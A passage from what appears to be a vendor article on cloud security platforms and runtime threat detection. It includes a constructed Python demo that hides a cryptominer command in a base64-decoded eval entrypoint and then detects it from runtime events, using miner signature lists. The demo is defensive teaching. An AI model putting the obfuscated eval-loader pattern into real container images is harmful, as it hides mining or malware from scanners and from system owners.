
Cloud, Cybersecurity, and the Role for CNAPP

potential security issues or active attacks to light. Runtime visibility can be delivered using a few different techniques: implementing traditional security agents within containers; using privileged containers; integrating Kubernetes data into your security tools; and using the Extended Berkeley Packet Filter (eBPF) to get real-time insight. With a new eBPF probe in its toolkit, the open-source project Falco supports runtime security insight into cloud deployments, containers, and Kubernetes deployments. 

A proper CNAPP, according to Gartner, must cover each of these use cases and ensure that they are managed effectively as part of the overall approach to cloud security. This means providing holistic and effective insight into what is taking place across the cloud, as well as how these environments are running over time.

Risks at runtime

Runtime security is essential to keeping your cloud environment secure. The qualities that make cloud environments popular, fast deployments and efficient, effective automation, serve threat actors just as well when they set out to attack enterprises and subvert systems. According to our 2023 Global Cloud Threat Report, the time between a threat actor gaining initial access and a payload being executed is ten minutes. Attackers turn our potential risks into cryptomining or malware attacks faster in the cloud because some of the steps in a cloud attack can be automated, and the reduced effort required also lets them scale up their attacks.

Runtime analysis can also help find hidden malicious images. Attackers can obfuscate the code in a container image so that static malware scanners and vulnerability scanning fail to identify it. In our research, we analyzed more than 13,000 container images found on Docker Hub and discovered 819 that contained malware. More than 10 percent of these malware-laden images passed through static analysis and vulnerability scanning without being detected. Once a container built from a covertly malicious image gets past your static and vulnerability scans, the container runs and the image carries out its intended activity, such as connecting to an attacker-controlled IP address, installing a cryptominer, or joining a proxy network. Proactive runtime analysis across your cloud environment mitigates this risk by detecting the threat before damage is done.
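As an added illustration of the point above (example code written for this page, not from the article or any CNAPP product; the image layer, runtime events and indicator list are all constructed): a static string scan over an image whose entrypoint hides its command behind base64 finds nothing, while the same indicators applied to process-exec and connect events reported at runtime flag the miner and its outbound connection.

```python
import base64
from typing import Dict, List

# Constructed image layer: the entrypoint hides its real command behind base64,
# so a static scan that looks for known-bad strings in file contents sees nothing.
HIDDEN_CMD = base64.b64encode(b"xmrig -o stratum+tcp://pool.example:3333").decode()
IMAGE_LAYER: Dict[str, str] = {
    "/entrypoint.sh": f'#!/bin/sh\neval "$(echo {HIDDEN_CMD} | base64 -d)"\n',
    "/etc/motd": "welcome\n",
}
# Indicators a static scanner might match (constructed, illustrative list).
MINER_SIGNATURES = ("xmrig", "stratum+tcp", "minerd")
# Destination ports a web container is expected to use; anything else is suspect.
ALLOWED_DST_PORTS = {443, 5432}

def static_scan(layer: Dict[str, str]) -> List[str]:
    """Static scan: return paths whose contents contain a known miner indicator."""
    return [path for path, body in layer.items()
            if any(sig in body for sig in MINER_SIGNATURES)]

def runtime_detect(events: List[dict]) -> List[str]:
    """Runtime detection over exec and connect events; the obfuscation no longer
    matters because the container has already decoded the command by exec time."""
    alerts = []
    for ev in events:
        cmdline = f'{ev["proc"]} {ev.get("args", "")}'
        if ev["type"] == "execve" and any(sig in cmdline for sig in MINER_SIGNATURES):
            alerts.append(f'{ev["container"]}: miner executed: {cmdline}')
        elif ev["type"] == "connect":
            port = int(ev["dst"].rsplit(":", 1)[1])
            if port not in ALLOWED_DST_PORTS:
                alerts.append(f'{ev["container"]}: {ev["proc"]} -> {ev["dst"]} (port {port})')
    return alerts

# Constructed runtime events, in the shape an eBPF-based sensor reports them.
RUNTIME_EVENTS = [
    {"type": "execve", "container": "web-7f9", "proc": "sh", "args": "/entrypoint.sh"},
    {"type": "execve", "container": "web-7f9", "proc": "xmrig",
     "args": "-o stratum+tcp://pool.example:3333"},
    {"type": "connect", "container": "web-7f9", "proc": "xmrig", "dst": "203.0.113.10:3333"},
    {"type": "connect", "container": "web-7f9", "proc": "nginx", "dst": "10.0.0.5:443"},
]

if __name__ == "__main__":
    print("static scan hits:", static_scan(IMAGE_LAYER))      # []
    print("runtime alerts:", runtime_detect(RUNTIME_EVENTS))  # 2 alerts
```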

The role of data in cloud security

CNAPP data collection and management should include both agent-based and agentless tools. Agentless security tools depend on the cloud provider's APIs to do their work: collecting data from cloud services, and snapshotting workloads so that the copies can be scanned. Agentless approaches are fast to implement, but they provide only point-in-time snippets of information, not real-time, continuous insight into runtime environments.

Conversely, agent-based security tools use agents or probes placed within the cloud workloads to generate the runtime insights that agentless tools cannot. This level of detail provides real-time visibility into running workloads and the risks they face, but it can take more time to get started. Together, the two kinds of tools provide the data you need from your cloud applications, infrastructure, and runtime environments to make informed security decisions. Rather than choosing between agent-based and agentless approaches, the right approach includes both.

Every component in your cloud environment can emit data about its operations, and that data is where you will find anomalies or evidence of attacks. Because of the sheer number of running applications, components, and containers, all deployed on Kubernetes and connected by APIs, the volume of available data can be overwhelming. All of it has to be sorted, understood, and prioritized in a timely manner so that the most valuable information can be addressed first. A CNAPP delivers that prioritized information to the security team quickly and easily, so they can focus first on the most critical risks.

The cloud security champion

Securing your cloud environment is a daunting task that requires engaging with a plethora of product acronyms across a huge variety of infrastructures, applications, and systems. CNAPPs aim to put the power back in the hands of the security team by reducing the gaps in cloud security and making risk remediation workflows more efficient. By using a CNAPP solution to prioritize your risks across applications, infrastructure, and runtime environments, you can improve your overall cloud security posture.
